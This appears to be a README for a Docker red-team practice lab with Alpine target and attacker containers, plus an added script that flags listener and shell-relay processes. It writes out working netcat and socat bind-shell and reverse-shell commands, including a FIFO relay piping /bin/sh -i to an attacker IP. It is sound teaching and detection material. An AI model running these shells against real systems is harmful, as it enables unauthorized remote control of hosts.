Set up containers using Alpine Linux as target and attacker for red-team exercises.
- The target has an IP address of `172.24.0.2`.
- The attacker has an IP address of `172.24.0.3`.
- The target and attacker have port 5009 exposed for `tcp` and `udp`.
- Port `5010` is exposed on the target and port `5011` is exposed on the attacker to the host.

The static IP addresses for the containers can be removed for nmap practice. Install other tools as needed in the Dockerfile for each image.
Build and run the containers. They will stay running in the shell you're using.
docker-compose up
Open a new terminal and set up on the `target` container:
docker exec -it target /bin/bash
Open a new terminal and set up on the `attacker` container:
docker exec -it attacker /bin/bash
Have the attacker connect to the target.
Netcat is everybody's go-to. The instructions below are for the neutered netcat-openbsd version.
Set up the listener on the `target`:
mkfifo f
nc -l -p 5009 0<f | /bin/bash > f 2>&1
On the `attacker` container, connect to the `target`:
nc 172.24.0.2 5009 -vvv
Socat is a better option since you can use history and encryption with `tty`. The target machine is likely going to have netcat installed, but once a shell session is established, you can install other tools.
Find the `target` IP address and set up the listener:
socat TCP-LISTEN:5009,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
On the `attacker` container interactive bash, connect to the `target`:
socat FILE:`tty`,raw,echo=0 TCP4:172.24.0.2:5009
Stop the connection with `exit` on the `attacker`.
Have the target connect to the attacker. This circumvents inbound firewall rules.
Set up the listener on the `attacker`:
nc -lvnp 5009 -vvv
On the `target` container interactive bash, connect to the `attacker`:
rm -f f 2> /dev/null
mkfifo f
cat f | /bin/sh -i 2>&1 | nc 172.24.0.3 5009 > f
OR
nc 172.24.0.3 5009 0<f | /bin/sh -i 2>&1 | tee f
Set up the listener on the `attacker`:
socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:5009
On the `target` container interactive bash, connect to the `attacker`:
socat TCP:172.24.0.3:5009 EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane
Stop the connection with `exit` on the `attacker`.
On the docker-compose terminal, press `ctrl+c` to stop the running containers.
docker-compose down
docker-compose --verbose up
Show a running container's IP address from the host:
docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' <container_name>
Show IP address from running container:
hostname -i
List running processes:
ps
Kill the specified process ID. You may need to do this for already running listeners.
kill <pid>
If you get `connection refused`, make sure your listener is running.
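To find listeners and shell relays left running from the steps above, the process list can be filtered for the patterns this lab creates. This is an added example, not part of the original lab files; it assumes input lines of the form `PID ARGS` (for example from `ps -o pid,args`), and the function names and the sample process list are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the lab repo): flag the listener and shell-relay
# process patterns this lab creates. Input lines are "PID ARGS...".

scan_procs() {
    awk '
    $1 !~ /^[0-9]+$/ { next }            # skip the header or malformed lines
    {
        reason = ""
        exe = $2; sub(/^.*\//, "", exe)  # basename of the executable
        if (exe == "nc" || exe == "ncat" || exe == "netcat") {
            # a short-option cluster containing "l" means listen mode
            for (i = 3; i <= NF; i++)
                if ($i ~ /^-[A-Za-z]*l/) reason = "netcat-listener"
        } else if (exe == "socat") {
            # socat handing its socket to a shell through EXEC:
            if ($0 ~ /EXEC:[^ ,]*sh/) reason = "socat-exec-shell"
        } else if (exe == "sh" || exe == "bash" || exe == "ash") {
            # shell forced interactive, as in the FIFO relay
            for (i = 3; i <= NF; i++)
                if ($i == "-i") reason = "forced-interactive-shell"
        }
        if (reason != "") print $1, reason
    }'
}

# Constructed sample process list modelled on the commands in this README.
sample_procs() {
    cat <<'EOF'
PID COMMAND
  1 /bin/sh -c sleep infinity
 21 nc -l -p 5009
 22 /bin/bash
 30 socat TCP-LISTEN:5009,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
 41 /bin/sh -i
 42 nc 172.24.0.3 5009
 50 socat TCP:172.24.0.3:5009 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
 60 crond -f
EOF
}

sample_procs | scan_procs
```

The flagged PIDs are the ones to stop with `kill` before starting a new listener on the same port.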
This is for educational purposes. Do not attack unauthorized systems.